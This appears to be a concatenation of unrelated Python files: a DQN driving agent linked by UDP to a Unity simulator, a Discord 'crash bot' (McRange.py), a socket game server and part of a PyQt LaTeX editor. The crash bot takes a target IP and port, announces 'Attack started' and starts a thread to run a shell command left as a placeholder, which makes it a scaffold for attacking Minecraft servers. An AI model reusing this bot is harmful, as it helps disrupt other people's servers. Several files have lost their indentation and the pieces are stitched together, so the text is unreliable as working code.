        here; see version history if it needs to be revived.)
        """
        return skimage.color.rgb2gray(obs)

    def update_target_model(self):
        """Copy the online network's weights into the target network."""
        # deepcopy the state_dict: loading a live state_dict would share tensors
        # between the two models (shallow copy).
        weight_model = copy.deepcopy(self.model.state_dict())
        self.target_model.load_state_dict(weight_model)

    def get_action(self, Input):
        """Epsilon-greedy action: random steering in [-1, 1] with prob. epsilon, else argmax-Q.

        Input is a pair (image stack, ego speed) fed to the model.
        """
        if np.random.rand() <= self.epsilon:
            return np.random.uniform(-1, 1)
        q_value = self.model(Input[0], Input[1])
        # Convert the categorical Q vector back to a steering value.
        return linear_unbin(q_value[0])

    def replay_memory(self, state, v_ego, action, reward, next_state, nextV_ego, done):
        """Store one transition (plus the current step t) and anneal epsilon linearly."""
        self.memory.append((state, v_ego, action, reward, next_state, nextV_ego, done, self.t))
        if self.epsilon > self.epsilon_min:
            self.epsilon -= (self.initial_epsilon - self.epsilon_min) / self.explore

    def train_replay(self):
        """Run one optimization step on a random minibatch (double-DQN-style target)."""
        if len(self.memory) < self.train_start:
            return
        batch_size = min(self.batch_size, len(self.memory))
        minibatch = random.sample(self.memory, batch_size)
        # torch.Tensor(...) produces float32 (FloatTensor); float64 would be DoubleTensor.
        state_t, v_ego_t, action_t, reward_t, state_t1, v_ego_t1, terminal, step = zip(*minibatch)
        state_t = Variable(torch.Tensor(state_t).squeeze().to(self.device))
        state_t1 = Variable(torch.Tensor(state_t1).squeeze().to(self.device))
        v_ego_t = Variable(torch.Tensor(v_ego_t).squeeze().to(self.device))
        # BUG FIX: was .to(device) — a module-level global — instead of the agent's
        # own device like the three lines above (NameError when no global exists).
        v_ego_t1 = Variable(torch.Tensor(v_ego_t1).squeeze().to(self.device))

        self.optimizer.zero_grad()
        targets = self.model(state_t, v_ego_t)
        self.max_Q = torch.max(targets[0]).item()
        # Online net selects the argmax action; target net supplies its value.
        target_val = self.model(state_t1, v_ego_t1)
        target_val_ = self.target_model(state_t1, v_ego_t1)
        for i in range(batch_size):
            if terminal[i] == 1:
                targets[i][action_t[i]] = reward_t[i]
            else:
                a = torch.argmax(target_val[i])
                targets[i][action_t[i]] = reward_t[i] + self.discount_factor * (target_val_[i][a])
        # NOTE(review): `targets` keeps its autograd history; consider targets.detach()
        # so the TD target receives no gradient — left unchanged to preserve behavior.
        logits = self.model(state_t, v_ego_t)
        loss = self.loss(logits, targets)
        loss.backward()
        self.optimizer.step()
        self.trainingLoss = loss.item()

    def load_model(self, name):
        """Restore model and optimizer state from checkpoint file *name*."""
        checkpoints = torch.load(name)
        self.model.load_state_dict(checkpoints['model'])
        self.optimizer.load_state_dict(checkpoints['optimizer'])

    def save_model(self, name):
        """Save model and optimizer state of the network under training to *name*."""
        torch.save({'model': self.model.state_dict(),
                    'optimizer': self.optimizer.state_dict()}, name)
# Single-target corner-coordinate (diagonal) box helpers
def xyxy2xywh(x):
    """Convert nx4 boxes from corner form [x1, y1, x2, y2] to center form [x, y, w, h].

    Accepts a torch.Tensor or numpy array; returns a new object of the same kind,
    leaving the input untouched.
    """
    boxes = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
    boxes[:, 0:2] = (x[:, 0:2] + x[:, 2:4]) / 2  # centers: midpoint of the two corners
    boxes[:, 2:4] = x[:, 2:4] - x[:, 0:2]        # width, height
    return boxes
def xyxy2xyxy(x):
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0]
y[:, 1] = x[:, 1]
y[:, 2] = x[:, 2]
y[:, 3] = x[:, 3]
y = y.type(torch.IntTensor)
return y
def linear_bin(a):
    """
    Convert a steering value to a one-hot categorical array.

    Parameters
    ----------
    a : int or float
        A value between -1 and 1

    Returns
    -------
    numpy.ndarray
        Length-21 one-hot vector with a 1 in the bin containing *a*.
    """
    shifted = a + 1                              # map [-1, 1] onto [0, 2]
    bin_index = int(round(shifted / (2 / 20)))   # 21 bins of width 0.1
    one_hot = np.zeros(21)
    one_hot[bin_index] = 1
    return one_hot
def linear_unbin(arr):
    """
    Convert a length-21 categorical array back to a steering value in [-1, 1].

    *arr* is expected to be a torch tensor (it is read via .data.cpu().numpy()).

    See Also
    --------
    linear_bin
    """
    values = arr.data.cpu().numpy()
    if len(values) != 21:
        raise ValueError('Illegal array length, must be 21')
    peak = np.argmax(values)
    return peak * 2 / 20 - 1
# def oberve():
#     revcData, (remoteHost, remotePort) = sock.recvfrom(65536)
def decode(revcData, v_ego = 0, force = 0, episode_len = 0):
    """Parse one UDP datagram from the simulator into an observation.

    The payload is a comma-separated string: gap, ego speed, lead speed,
    ego acceleration, then a base64-encoded camera frame.  The frame is
    archived to disk and downscaled to 80x80; reward and done flag are
    derived from the decoded physics values.
    NOTE(review): relies on module globals PATH_DATASET, time_Feature
    and agent — confirm they are defined before first call.
    """
    # received data processing
    revcList = str(revcData).split(',', 4)
    gap = revcList[0][2:] # distance between vehicles; [2:] strips the "b'" prefix left by str(bytes)
    v_ego1 = revcList[1] # speed of egoVehicle
    v_lead = revcList[2] # speed of leadVehicle
    a_ego1 = revcList[3] # acceleration of egoVehicle
    img = base64.b64decode(revcList[4]) # image from mainCamera
    image = Image.open(io.BytesIO(img))
    image.save(f'./{PATH_DATASET}/data_{time_Feature}/{agent.t:05}.jpg', quality=95)
    # image resize, bilinear interpolation
    image = image.resize((80, 80), resample=Image.BILINEAR)
    image = np.array(image)
    done = 0
    reward = CalReward(float(gap), float(v_ego), float(v_lead), force)
    # done=1: crash / lost the lead vehicle; done=2: episode length cap reached
    if float(gap) <= 3 or float(gap) >= 300:
        done = 1
        reward = -1.0
    elif episode_len > 480:
        done = 2
        # reward = CalReward(float(gap), float(v_ego), float(v_lead), force)
    return image, reward, done, float(gap), float(v_ego1), float(v_lead), float(a_ego1)
def CalReward(gap, v_ego, v_lead, force):
    """Reward = power/consumption term (Rp) times gap-keeping term (Rd).

    ``force`` maps to acceleration (x3.5 when positive, x5.5 when
    negative).  Rp is a polynomial in ego speed and acceleration,
    clamped to be non-positive, shifted by +195, and zeroed above
    40 m/s.  Rd scores the following distance.  The product is scaled
    by 1/195 into roughly [0, 1].

    Note: ``v_lead`` is accepted for interface parity but unused.
    """
    accel = 3.5 * force if force > 0 else 5.5 * force
    # Polynomial coefficients of the consumption model (index-named to
    # mirror the original L0..L12 labels).
    c0, c1, c3, c4 = -3.037, -0.591, -1.047e-3, -1.403
    c5, c8, c11, c12 = 2.831e-2, -7.98e-2, 3.535e-3, -0.243
    Rp = (c0 + c1*v_ego + c3*(v_ego**3) + c4* v_ego * accel + c5*(v_ego**2) + c8 * (v_ego**2) * accel + c11 * (v_ego**3) * accel + c12 * v_ego * (accel**2))
    Rp = min(Rp, 0) + 195
    if v_ego > 40:
        Rp = 0
    # reward for gap
    if 40 <= gap <= 60:
        Rd = 1
    elif 30 <= gap < 40:
        Rd = 0.5
    elif 60 < gap <= 100:
        Rd = 0.5
    else:
        Rd = 0.0
    return Rp*Rd/195.0
def reset():
    """Ask the Unity simulator to reset the episode.

    Sends message code 3 with a zero payload over the module-global UDP
    socket; relies on globals ``sock``, ``remoteHost`` and
    ``remotePort`` captured in the main loop.
    """
    strr = str(3) + ',' + '0.0'
    sendDataLen = sock.sendto(strr.encode(), (remoteHost, remotePort))
def print_out(file, text):
    """Append one log line to ``file`` and flush both the file and
    stdout so output appears immediately."""
    line = text + '\n'
    file.write(line)
    file.flush()
    sys.stdout.flush()
# @profile
def thread_Train_init():
    """Background training loop (intended to run as a daemon thread).

    Waits until the replay buffer has at least ``agent.train_start``
    samples, then repeatedly calls ``agent.train_replay`` with a short
    sleep between steps.  Runs forever.
    """
    global agent
    step_epsode = 0
    while True:
        # Buffer not warm yet: back off and re-check.
        if len(agent.memory) < agent.train_start:
            time.sleep(5)
            continue
        agent.train_replay()
        time.sleep(0.1)
        step_epsode += 1
        # print('train complete in num: %s' %str(step_epsode))
def log_File_path(path):
    """Open (for writing) the training log file inside ``path``, named
    after the module-global ``time_Feature`` timestamp, and return the
    open handle."""
    log_name = 'train_log_{}.txt'.format(time_Feature)
    return open(os.path.join(path, log_name), 'w')
def random_sample(state_t, v_t, state_t1, v_t1):
    """Apply one shared random permutation to the channel (last) axis of
    both state stacks and the matching speed histories.

    The original referenced a module global ``random_index`` whose
    definition was commented out, raising NameError at call time; the
    permutation is now drawn from the actual channel count of
    ``state_t`` (channels-last layout, matching ``v_t``'s second axis).
    """
    random_index = np.random.permutation(state_t.shape[-1])
    state_t = state_t[:, :, :, random_index]
    v_t = v_t[:, random_index]
    state_t1 = state_t1[:, :, :, random_index]
    v_t1 = v_t1[:, random_index]
    return state_t, v_t, state_t1, v_t1
def Recv_data_Format(byte_size, _done, v_ego=None, action=None, episode_len=None, s_t=None, v_ego_t=None):
    """Receive one UDP datagram and shape it into network-ready arrays.

    With ``_done != 0`` (episode start) the single frame is tiled into a
    4-deep history stack and the sender's address is returned alongside
    it.  Otherwise the new frame/speed are pushed onto the front of the
    existing ``s_t`` / ``v_ego_t`` histories and the full step tuple
    (reward, done, physics values, new stacks) is returned.
    NOTE(review): uses module globals ``sock`` and ``agent``.
    """
    if _done != 0:
        revcData, (remoteHost, remotePort) = sock.recvfrom(byte_size)
        image, _, _, gap, v_ego, _, a_ego = decode(revcData)
        x_t = agent.process_image(image)
        # Tile the first frame/speed four times to seed the history.
        s_t = np.stack((x_t, x_t, x_t, x_t), axis=0)
        v_ego_t = np.array((v_ego, v_ego, v_ego, v_ego))
        # In Keras, need to reshape
        s_t = s_t.reshape(1, s_t.shape[0], s_t.shape[1], s_t.shape[2]) #1*80*80*4
        v_ego_t = v_ego_t.reshape(1, v_ego_t.shape[0]) #1*4
        return s_t, v_ego_t, v_ego, remoteHost, remotePort
    else:
        revcData, (remoteHost, remotePort) = sock.recvfrom(byte_size)
        image, reward, done, gap, v_ego1, v_lead, a_ego1 = decode(revcData, v_ego, action, episode_len)
        x_t1 = agent.process_image(image)
        x_t1 = x_t1.reshape(1, 1, x_t1.shape[0], x_t1.shape[1]) # 1x1x80x80
        # Newest frame first, drop the oldest of the previous four.
        s_t1 = np.append(x_t1, s_t[:, :3, :, :], axis=1) # 1x4x80x80
        v_ego_1 = np.array(v_ego1)
        v_ego_1 = np.expand_dims(v_ego_1, -1)
        v_ego_1 = np.expand_dims(v_ego_1, -1)
        v_ego_t1 = np.append(v_ego_1, v_ego_t[:, :3], axis=1) # 1x4
        return reward, done, gap, v_ego1, v_lead, a_ego1, v_ego_1, s_t1, v_ego_t1
# def Send_data_Format(remoteHost, remotePort, onlyresetloc, s_t, v_ego_t):
def Send_data_Format(remoteHost, remotePort, s_t, v_ego_t, episode_len, UnityReset):
    """Pick an action for the current state and send it to the simulator.

    Message code 4 signals "first action after a reset", otherwise
    code 1 is used; the measured inference+send duration is returned for
    logging.  NOTE(review): uses module globals ``agent``, ``sock``,
    ``device`` and the ``dt`` (datetime) alias.
    """
    pred_time_pre = dt.datetime.now()
    episode_len = episode_len + 1
    # Get action for the current state and go one step in environment
    s_t = torch.Tensor(s_t).to(device)
    v_ego_t = torch.Tensor(v_ego_t).to(device)
    force = agent.get_action([s_t, v_ego_t])
    action = force
    if UnityReset == 1:
        strr = str(4) + ',' + str(action)
        UnityReset = 0
    else:
        strr = str(1) + ',' + str(action)
    sendDataLen = sock.sendto(strr.encode(), (remoteHost, remotePort)) # 0.06s later receive
    pred_time_end = dt.datetime.now()
    time_cost = pred_time_end - pred_time_pre
    return episode_len, action, time_cost, UnityReset
def Model_save_Dir(PATH, time):
    """Return (creating it if needed) the checkpoint directory
    ``PATH/save_model_<time>/``.

    Uses ``os.makedirs(..., exist_ok=True)`` so missing parent
    directories and the exists-check/mkdir race of the original no
    longer raise.
    """
    path_to_return = os.path.join(PATH, 'save_model_{}'.format(time)) + '/'
    os.makedirs(path_to_return, exist_ok=True)
    return path_to_return
if __name__ == "__main__":
    # Ensure the log / model / dataset directories exist for this run.
    if not os.path.exists('./' + PATH_LOG):
        os.mkdir(os.path.join(os.getcwd().replace('\\', '/'), PATH_LOG))
    if not os.path.exists('./' + PATH_MODEL):
        os.mkdir(os.path.join(os.getcwd().replace('\\', '/'), PATH_MODEL))
    os.mkdir(os.path.join(os.getcwd(), PATH_DATASET, f'data_{time_Feature}').replace('\\', '/'))
    # UDP endpoint the Unity simulator talks to.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('127.0.0.1', 8001))
    device = torch.device('cpu')
    # Get size of state and action from environment
    state_size = (img_rows, img_cols, img_channels)
    action_size = 21 # env.action_space.n # Steering and Throttle
    train_log = log_File_path(PATH_LOG)
    PATH_ = Model_save_Dir(PATH_MODEL, time_Feature)
    agent = DQNAgent(state_size, action_size, device)
    episodes = []
    if not agent.train:
        print("Now we load the saved model")
        agent.load_model("C:/DRL_data/Python_Project/Enhence_Learning/save_Model/save_model_1627300305/save_model_248.pt")
    else:
        # train_thread = threading.Thread(target=thread_Train_init)
        # train_thread.start()
        print('Thread Ready!!!')
    done = 0
    for e in range(EPISODES):
        print("Episode: ", e)
        # Multi Thread
        # done==2 means the last episode hit the length cap: continue
        # without asking Unity for a fresh reset handshake.
        if done == 2:
            print("new continued epicode!")
            done = 0
            UnityReset = 1
            episode_len = 0
        else:
            # A later-stage reset goes through the first recv handshake.
            print('done value:', done)
            print("new fresh episode!")
            done = 1
            s_t, v_ego_t, v_ego, remoteHost, remotePort = Recv_data_Format(unity_Block_size, done)
            done = 0
            UnityReset = 0
            episode_len = 0
        while done == 0:
            start_time = time.time()
            # Reset the running-reward window every 1000 global steps.
            if agent.t % 1000 == 0:
                rewardTot = []
            episode_len, action, time_cost, UnityReset = Send_data_Format(remoteHost, remotePort, s_t, v_ego_t, episode_len, UnityReset)
            reward, done, gap, v_ego1, v_lead, a_ego1, v_ego_1, s_t1, v_ego_t1 = Recv_data_Format(unity_Block_size, done, v_ego, action, episode_len, s_t, v_ego_t)
            rewardTot.append(reward)
            start_count_time = int(round(time.time() * 1000))
            if agent.train:
                # s_t, v_ego_t, s_t1, v_ego_t1 = random_sample(s_t, v_ego_t, s_t1, v_ego_t1)
                agent.replay_memory(s_t, v_ego_t, np.argmax(linear_bin(action)), reward, s_t1, v_ego_t1, done)
                agent.train_replay()
            s_t = s_t1
            v_ego_t = v_ego_t1
            v_ego = v_ego_1
            agent.t = agent.t + 1
            print("EPISODE", e, "TIMESTEP", agent.t,"/ ACTION", action, "/ REWARD", reward, "Avg REWARD:",
                  sum(rewardTot)/len(rewardTot) , "/ EPISODE LENGTH", episode_len, "/ Q_MAX " ,
                  agent.max_Q, "/ time " , time_cost, a_ego1)
            format_str = ('EPISODE: %d TIMESTEP: %d EPISODE_LENGTH: %d ACTION: %.4f REWARD: %.4f Avg_REWARD: %.4f training_Loss: %.4f Q_MAX: %.4f gap: %.4f v_ego: %.4f v_lead: %.4f time: %.0f a_ego: %.4f')
            text = (format_str % (e, agent.t, episode_len, action, reward, sum(rewardTot)/len(rewardTot), agent.trainingLoss*1e3, agent.max_Q, gap, v_ego1, v_lead, time.time()-start_time, a_ego1))
            print_out(train_log, text)
            if done:
                agent.update_target_model()
                episodes.append(e)
                # Save model for every 2 episode
                if agent.train and (e % 2 == 0):
                    agent.save_model(os.path.join(PATH_, "save_model_{}.h5".format(e)))
                print("episode:", e, " memory length:", len(agent.memory),
                      " epsilon:", agent.epsilon, " episode length:", episode_len)
        # Crash/terminal episodes (done==1) require an explicit reset.
        if done == 1:
            reset()
            time.sleep(0.5)
        print('Data receive from unity, time:', int(round(time.time() * 1000) - start_count_time))
# Tensorboard_saver = tf.summary.FileWriter('E:/Python_Project/Enhence_Learning/Tensorboard/', tf.get_default_graph())
# lp = LineProfiler()
# lp_wrapper = lp(agent.train_replay())
# lp.print_stats()
|
McRange.py | import random
import socket
import threading
import discord
from discord.ext import commands
import os
import threading
import asyncio
import requests
client= commands.Bot(command_prefix = '.')
print("""
SSSSSSSSSSSSSSS KKKKKKKKK KKKKKKKIIIIIIIIIIDDDDDDDDDDDDD
SS:::::::::::::::SK:::::::K K:::::KI::::::::ID::::::::::::DDD
S:::::SSSSSS::::::SK:::::::K K:::::KI::::::::ID:::::::::::::::DD
S:::::S SSSSSSSK:::::::K K::::::KII::::::IIDDD:::::DDDDD:::::D
S:::::S KK::::::K K:::::KKK I::::I D:::::D D:::::D
S:::::S K:::::K K:::::K I::::I D:::::D D:::::D
S::::SSSS K::::::K:::::K I::::I D:::::D D:::::D
SS::::::SSSSS K:::::::::::K I::::I D:::::D D:::::D
SSS::::::::SS K:::::::::::K I::::I D:::::D D:::::D
SSSSSS::::S K::::::K:::::K I::::I D:::::D D:::::D
S:::::S K:::::K K:::::K I::::I D:::::D D:::::D
S:::::SKK::::::K K:::::KKK I::::I D:::::D D:::::D
SSSSSSS S:::::SK:::::::K K::::::KII::::::IIDDD:::::DDDDD:::::D
S::::::SSSSSS:::::SK:::::::K K:::::KI::::::::ID:::::::::::::::DD
S:::::::::::::::SS K:::::::K K:::::KI::::::::ID::::::::::::DDD
SSSSSSSSSSSSSSS KKKKKKKKK KKKKKKKIIIIIIIIIIDDDDDDDDDDDDD
Mcrange crash bot by ae#7990
""")
@client.event
async def on_ready():
print("bot dziala")
@client.command()
async def aegis(ctx, arg1, arg2):
embed = discord.Embed(colour = discord.Colour.blue())
embed.add_field(name='<--> Attack started <-->', value=f'ip: {arg1}', inline=False)
embed.add_field(name='-------------------', value=f'port: {arg2}', inline=False)
embed.add_field(name='<--> Attack started <-->', value='', inline=True)
embed.set_footer(text='Developer your toem#7990')
embed.set_thumbnail(url='https://cdn.discordapp.com/attachments/854388755463798844/858007596337201152/PicsArt_06-25-03.48.06.png')
embed.set_image(url='https://cdn.discordapp.com/attachments/854388755463798844/858007598816690196/PicsArt_06-25-03.54.17.jpg')
await ctx.send(embed=embed)
def attack():
os.system(f"your command")
t1 = threading.Thread(target=attack)
t1.start()
@client.command()
async def instant(ctx, arg1, arg2):
embed = discord.Embed(colour = discord.Colour.blue())
embed.add_field(name='<--> Attack started <-->', value=f'ip: {arg1}', inline=False)
embed.add_field(name='-------------------', value=f'port: {arg2}', inline=False)
embed.add_field(name='<--> Attack started <-->', value='', inline=True)
embed.set_footer(text='Developer your toem#7990')
embed.set_thumbnail(url=f'https://api.mcsrvstat.us/icon/{arg1}')
embed.set_image(url='https://cdn.discordapp.com/attachments/854388755463798844/858007598816690196/PicsArt_06-25-03.54.17.jpg')
await ctx.send(embed=embed)
def attack():
os.system(f"your command")
t1 = threading.Thread(target=attack)
t1.start()
await ctx.send(embed=embed)
client.run('token')
|
pfsystem.py | # !/usr/bin/env python3
# -*- coding:utf-8 -*-
__author__ = 'Zhiquan Wang'
__date__ = '2018/7/20 22:28'
import threading
from networkservice import *
from pfgame import *
from pfmessage import *
class PixelFightSystem(object):
    """Game server facade: owns the network service and the game loop."""

    def __init__(self, *, ip=None, port=None):
        self.__networkSev = NetworkService(ip, port)
        self.__game = PixelFightGame()

    def launch(self):
        """Start the socket listener on a background thread, then run
        the game loop on the calling thread."""
        network_thread = threading.Thread(target=self.launch_socket)
        network_thread.start()
        self.__game.launch()

    # Start listening on the server side; spawn one handler thread per
    # newly accepted connection.
    def launch_socket(self):
        try:
            self.__networkSev.listen()
            print('Start Listening')
            while True:
                client_socket_info = self.__networkSev.socket.accept()
                address_thread = threading.Thread(target=self.__address_msg, args=(client_socket_info,))
                address_thread.start()
        except Exception:
            print('Launch Server System Failed')

    # Per-connection handler thread: keep receiving and dispatch each
    # message until the peer disconnects.
    def __address_msg(self, _c_socket_info):
        client_socket = _c_socket_info[0]
        try:
            while True:
                data = client_socket.recv(2048)
                if not data:
                    # recv() returning b'' means the peer closed the
                    # connection.  The original `continue` here spun the
                    # thread at 100% CPU forever on disconnect.
                    break
                client_msg = data.decode('utf-8')
                self.__address_request(client_msg, client_socket)
        finally:
            # Always release the socket, even if dispatch raised.
            client_socket.close()

    # Request dispatcher: identify the message type and serve it.
    def __address_request(self, _msg, _s):
        tmp_type = get_msg_type(_msg)
        print(u'Server Receive:' + _msg + ':End')
        if tmp_type == MessageType.login_request:
            tmp_obj = LoginRequest(json_info=_msg)
            tmp_id = self.__game.gen_player_id(tmp_obj.usr_name, _s)
            tmp_rep = LoginReply(id=tmp_id).dump_json()
            _s.sendall(tmp_rep.encode('utf-8'))
            print(u'Server Reply:' + tmp_rep + ':End')
            # When every expected player has joined, start the game.
            if len(self.__game.player_info_list) == self.__game.game_rule.player_num:
                self.__game.is_ready = True
        elif tmp_type == MessageType.attack_request:
            tmp_obj = AttackRequest(json_info=_msg)
            self.__game.attack_grid(tmp_obj.x, tmp_obj.y, tmp_obj.player_id)
            print("Player :" + tmp_obj.player_id + "Attack : " + str(tmp_obj.x) + " - " + str(tmp_obj.y))
            self.__game.is_pause = False
|
gui.py | """
The GUI file, reserved for all interactions
GUI-wise and some others that fit within the
category or are critical / necessary for the GUI to run.
"""
from os import listdir
from random import randint
from threading import Thread
from time import sleep, time
from PyQt5 import QtGui
from PyQt5.QtCore import QEvent, Qt, QCoreApplication, QTimer
from PyQt5.QtGui import QPixmap, QIcon, QFont, QTextCursor, QTextBlockFormat, QColor
from PyQt5.QtWidgets import QLabel, QPlainTextEdit, QMainWindow, QListWidget, QListWidgetItem, QGroupBox, QSpinBox
from keyboard import is_pressed as is_key_pressed
from compile import compile_to_image
from error import Error
from menu import Menu, Status
from project import Project
from updater import Updater
from utility import Utility
# Initialize class
# noinspection PyCompatibility,PyAttributeOutsideInit
class App(QMainWindow):
"""
The App class, for everything-GUI.
Executed by the main.py file.
"""
# Constructor
def __init__(self):
    """
    The initializer / constructor method of the GUI class.

    Builds the whole window in one pass: settings, theme, the initial
    Project, every widget (editor, live preview, settings slides,
    menu/status bars), the live-compile polling timer, and finally the
    first paint.  Order matters in several places — see the inline
    notes, in particular that the menu and status bars must be the last
    elements created.
    """
    super().__init__()
    # Initialize exit codes (These are arbitrary values with no hidden meaning)
    self.restart_code = -54321
    # Create instance of Error class
    self.error_instance = Error()
    # Create instance of Utility for later usage
    self.utils = Utility(self)
    # Verify that file system is intact
    self.utils.verify_system()
    # Pull settings
    self.settings = self.utils.get_settings()
    # Clear cache
    self.utils.clear_cache()
    # Load the theme
    self.theme = self.utils.load_theme(self.settings)
    # Open new project (remove this part and integrate Open File, when the Open File features is ready)
    self.project = Project("../project/current.tex")
    self.project.new()
    self.projects = [self.project]
    self.projects_index = int()
    # Create an instance of the Updater class
    self.updater_instance = Updater()
    # Set default compiler live identifier number
    self.live = int()
    self.live_update = int()
    self.live_compile = str()
    # Other attributes
    self.last_data = str()
    self.last_update = time()
    self.status = str()
    self.settings_opened = False
    # Get screen data
    self.screen_width = self.utils.get_screen()[0]
    self.screen_height = self.utils.get_screen()[1]
    # Set min_spin size
    min_width = int(self.screen_width * self.settings["min_ratio"])
    min_height = int(self.screen_height * self.settings["min_ratio"])
    self.setMinimumSize(min_width, min_height)
    # Set icon
    self.setWindowIcon(QIcon("../resources/logo.jpg"))
    # Title
    self.title = self.settings["window_title"]
    # Screen coordinate initialization
    self.left = self.settings["init_x"]
    self.top = self.settings["init_y"]
    # Calculate gui size
    self.width = int(self.screen_width * self.settings["screen_ratio"])
    self.height = int(self.screen_height * self.settings["screen_ratio"])
    # Initialize elements
    # Default parameter values are all 0 because self.resizeElements
    # will update the positioning and size of each element regardless
    # The editor box which code is written in
    self.editor_box = self.make_text_box()
    self.editor_box.ensureCursorVisible()
    self.editor_box.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    self.editor_box.setFont(QFont(self.settings["editor_font"], self.settings["editor_size"]))
    self.editor_box.setCursorWidth(self.settings["cursor_width"])
    self.editor_box.installEventFilter(self)
    # The live-compile renderer element
    self.editor_compiled = self.make_pic(background=self.theme["Live"]["background-color"])
    # Create Settings list element
    self.settings_list = self.make_list(["Appearance", "Shortcuts", "Advanced"])
    self.settings_list.setFont(
        QFont(
            self.settings["menu_font"],
            self.width ** 0.5 * 0.5
        )
    )
    # Create groups for elements
    self.theme_group = QGroupBox(self)
    self.editor_group = QGroupBox(self)
    self.menu_group = QGroupBox(self)
    # Rename the group titles
    self.theme_group.setTitle("Theme")
    self.editor_group.setTitle("Editor")
    self.menu_group.setTitle("Menu")
    # For each theme file in the themes folder...
    theme_list = list()
    for file in listdir("../gui_themes"):
        if file.endswith(".yaml"):
            # Append it to the theme list
            theme_list.append(file[:-5])
    # Create the list widget with the themes
    self.theme_select_element = self.make_list(
        items=theme_list,
        parent=self.theme_group
    )
    # Specify the valid fonts
    font_list = ["Consolas", "Arial", "Comic Sans"]
    # Create the font selection elements
    self.font_select_element = self.make_list(
        items=font_list,
        parent=self.editor_group
    )
    self.menu_font_select_element = self.make_list(
        items=font_list,
        parent=self.editor_group
    )
    # Create the spinbox elements
    self.font_size_element = self.make_spinbox(
        min_spin=8,
        max_spin=22,
        step=2,
        parent=self.editor_group
    )
    self.cursor_size_element = self.make_spinbox(
        min_spin=1,
        max_spin=10,
        parent=self.editor_group
    )
    # Create the text elements
    self.font_size_label_element = self.make_text(
        text="Font Size",
        parent=self.editor_group
    )
    self.cursor_size_label_element = self.make_text(
        text="Cursor Size",
        parent=self.editor_group
    )
    self.editor_font_element = self.make_text(
        text="Editor Font",
        parent=self.editor_group
    )
    # Create the spinbox elements
    self.menu_bar_size_select_element = self.make_spinbox(
        min_spin=6,
        max_spin=14,
        parent=self.menu_group
    )
    self.status_bar_size_select_element = self.make_spinbox(
        min_spin=6,
        max_spin=14,
        parent=self.menu_group
    )
    self.status_bar_margin_select_element = self.make_spinbox(
        min_spin=1,
        max_spin=20,
        parent=self.menu_group
    )
    self.status_bar_spacing_select_element = self.make_spinbox(
        min_spin=1,
        max_spin=10,
        parent=self.menu_group
    )
    # Create the text elements
    self.menu_bar_size_element = self.make_text(
        text="Menu Bar Size",
        parent=self.menu_group
    )
    self.status_bar_size_element = self.make_text(
        text="Status Bar Size",
        parent=self.menu_group
    )
    self.menu_font_element = self.make_text(
        text="Menu Font",
        parent=self.menu_group
    )
    self.status_bar_margin_element = self.make_text(
        text="Status Bar Margin",
        parent=self.menu_group
    )
    self.status_bar_spacing_element = self.make_text(
        text="Status Bar Spacing",
        parent=self.menu_group
    )
    # Force disable scrolling
    self.theme_select_element.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    self.theme_select_element.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    self.font_select_element.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    self.font_select_element.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    self.menu_font_select_element.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    self.menu_font_select_element.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
    # Set the order of how tabs jump through elements
    self.set_tab_order([
        self.theme_select_element,
        self.menu_font_select_element,
        self.menu_bar_size_select_element,
        self.status_bar_size_select_element,
        self.status_bar_margin_select_element,
        self.status_bar_spacing_select_element,
        self.font_select_element,
        self.font_size_element,
        self.cursor_size_element
    ])
    # Create instance of Menu and Status Bar classes
    # Initialize it here rather in the above 'attribute initialization section'
    # because you can't call the Status Bar updating function until
    self.menu_bar_instance = Menu(self)
    self.status_bar_instance = Status(self)
    # MAKE SURE THAT MENU BAR AND STATUS BAR ARE THE LAST 2 ELEMENTS TO BE INITIALIZED
    # If not, the next element to be created will overlap the menu bar &
    # status bar and will cause an unfortunate rendering bug.
    # Initialize the menu bar
    self.menu_bar_instance.init()
    # Initialize the status bar
    self.status_bar_instance.init()
    # Initialize the status bar data
    self.status_bar_instance.init_status()
    # Set Project focus to current project
    self.switch_project()
    # Set a timer to constantly check for new edits
    self.update_timer = QTimer(self)
    self.update_timer.setInterval(self.settings["live_await"] * 1000)
    self.update_timer.timeout.connect(self.check_data_update)
    self.update_timer.start()
    # Default to Editor slide being displayed
    # Call this so that all non-editor elements are hidden
    self.show_editor()
    # Call GUI creation
    self.initUI()
    # Set the theme of the whole window
    self.setStyleSheet("background-color: {QMainWindowBGColor};".strip().format(
        QMainWindowBGColor=self.utils.hex_format(self.theme["GUI"]["QMainWindow"]["background-color"])
    ))
    # Resize the elements to the current window size
    self.resizeEvent()
# noinspection PyCompatibility
def event(self, e):
    """
    PyQt5 built-in event hook.

    Invoked by the PyQt5 framework (never directly by this code); when
    Qt tries to clear the status tip with an empty string, the last
    status-bar text is re-injected instead.
    """
    if e.type() == QEvent.StatusTip and e.tip() == '':
        e = QtGui.QStatusTipEvent(self.status_bar_instance.status)
    return super().event(e)
def eventFilter(self, obj, event):
    """
    Intercept events generated in the editor box (mostly keystrokes)
    and handle custom key binds before Qt processes them.
    """
    if obj is self.editor_box and event.type() == QEvent.KeyPress:
        self.status_bar_instance.update_status({"Task": "Parsing binds..."})
        # Shift + Return inserts a LaTeX line break plus a newline.
        if is_key_pressed("return") and is_key_pressed("shift"):
            self.editor_box.insertPlainText("\\\\\n")
            return True
        self.status_bar_instance.update_status({"Task": "Idling"})
    return super(App, self).eventFilter(obj, event)
def check_data_update(self):
    """
    Poll the editor box for text changes; intended to be driven by a
    repeating timer.  On a change, either kick off a threaded compile
    (non-empty text) or blank the live preview (empty text).
    """
    current = self.editor_box.toPlainText()
    # Nothing changed since the last poll - bail out early.
    if self.last_data == current:
        return
    self.last_data = current
    if current.strip():
        # Text present: schedule a (debounced) live compile.
        self.thread_compile()
    else:
        # No text at all: make sure no stale picture is shown.
        self.editor_compiled.setPixmap(QPixmap())
        self.status_bar_instance.update_status({"Task": "Idling"})
def thread_compile(self):
    """
    Spawn a daemon thread that, after a debounce delay, compiles the
    current LaTeX source into the live preview image.

